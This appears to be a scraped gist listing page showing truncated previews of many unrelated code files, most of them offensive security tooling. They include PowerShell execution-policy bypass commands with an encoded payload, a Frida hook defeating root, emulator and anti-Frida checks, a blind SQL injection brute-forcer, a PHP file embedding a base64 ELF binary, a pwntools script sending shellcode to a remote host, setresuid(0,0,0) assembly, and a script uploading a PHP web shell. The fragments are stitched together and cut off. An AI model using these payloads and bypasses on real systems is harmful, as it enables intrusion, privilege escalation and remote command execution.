This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/ | |
powershell.exe -ExecutionPolicy Bypass | |
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1 | |
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1 | |
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1 | |
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile - | |
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA | |
Set-ExecutionPolicy Bypass -Scope Process |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Java.perform(() => { | |
let RootDetector = Java.use("***.*****.**********.RootDetector"); | |
RootDetector["isRooted"].implementation = function () { | |
return false; // only for boolean function calling | |
}; | |
let EmulatorDetector = Java.use("***.*****.*********.EmulatorDetector"); | |
EmulatorDetector["isEmulator"].implementation = function () { | |
return false; // only for boolean function calling | |
}; | |
let AntiFrida = Java.use("***.*****.*********.AntiFrida"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import requests | |
import string | |
characters = string.ascii_letters + string.digits | |
ascii_values = [ord(char) for char in characters] | |
pos = 1 | |
database_name = '' | |
searching = True |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$hook = 'f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAA4AcAAAAAAABAAAAAAAAAAIARAAAAAAAAAAAAAEAAOAAHAEAAGwAaAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbAoAAAAAAABsCgAAAAAAAAAAIAAAAAAAAQAAAAYAAAD4DQAAAAAAAPgNIAAAAAAA+A0gAAAAAABwAgAAAAAAAHgCAAAAAAAAAAAgAAAAAAACAAAABgAAABgOAAAAAAAAGA4gAAAAAAAYDiAAAAAAAMABAAAAAAAAwAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAyAEAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAkAAAAAAAAAAQAAAAAAAAAUOV0ZAQAAAB4CQAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAFLldGQEAAAA+A0AAAAAAAD4DSAAAAAAAPgNIAAAAAAACAIAAAAAAAAIAgAAAAAAAAEAAAAAAAAABAAAABQAAAADAAAAR05VAGhkFopFVPvXbYbBilBq7Sd8S1krAAAAAAMAAAANAAAAAQAAAAYAAACIwCBFAoRgGQ0AAAARAAAAEwAAAEJF1exgXb1c3muVgLvjknzYcVgcuY3xDurT7w4bn4gLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHkAAAASAAAAAAAAAAAAAAAAAAAAAAAAABwAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIYAAAASAAAAAAAAAAAAAAAAAAAAAAAAAJcAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAASAAAAAAAAAAAAAAAAAAAAAAAAAGEAAAAgAAAAAAAAAAAAAAAAAAAAA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
context(arch="i386", os="linux", log_level="debug") | |
r = remote("192.168.1.100", 12321) | |
bin_sh = b"" | |
bin_sh += b"\xb8\x07\x5c\xd7\x1a\xd9\xc5\xd9\x74\x24\xf4" | |
bin_sh += b"\x5e\x2b\xc9\xb1\x12\x31\x46\x12\x83\xc6\x04" | |
bin_sh += b"\x03\x41\x52\x35\xef\x7c\xb1\x4e\xf3\x2d\x06" | |
bin_sh += b"\xe2\x9e\xd3\x01\xe5\xef\xb5\xdc\x66\x9c\x60" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const axios = require("axios"); | |
const readline = require("readline"); | |
const cheerio = require("cheerio"); | |
const colors = { | |
reset: "\x1b[0m", | |
bright: "\x1b[1m", | |
dim: "\x1b[2m", | |
underscore: "\x1b[4m", | |
blink: "\x1b[5m", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
section .text | |
global main | |
main: | |
xor eax, eax | |
xor ebx, ebx | |
xor ecx, ecx | |
xor edx, edx | |
mov al, 0xd0 | |
int 0x80 ; setresuid(0, 0, 0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import random | |
import string | |
def upload_txt_file(file_name): | |
file_data = "<?=`$_POST[0]`?>" | |
upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php" | |
files = {"upload[]": (file_name, file_data, "application/x-httpd-php")} | |
data = {"cmd": "upload", "target": "l1_Lw"} | |
response = requests.post(upload_uri, files=files, data=data) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from twikit import Client | |
import json | |
import pandas as pd | |
import itertools | |
USERNAME = 'username here' | |
EMAIL = 'email here' | |
PASSWORD = 'password here' | |
client = Client('en-US') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /erp/admin/security_file.php HTTP/1.1 | |
Host: 10.1.2.120 | |
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
Accept-Language: en-US,en;q=0.5 | |
Accept-Encoding: gzip, deflate | |
Referer: http://10.1.2.120/erp/admin/security_file.php | |
Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73 | |
DNT: 1 | |
Connection: close |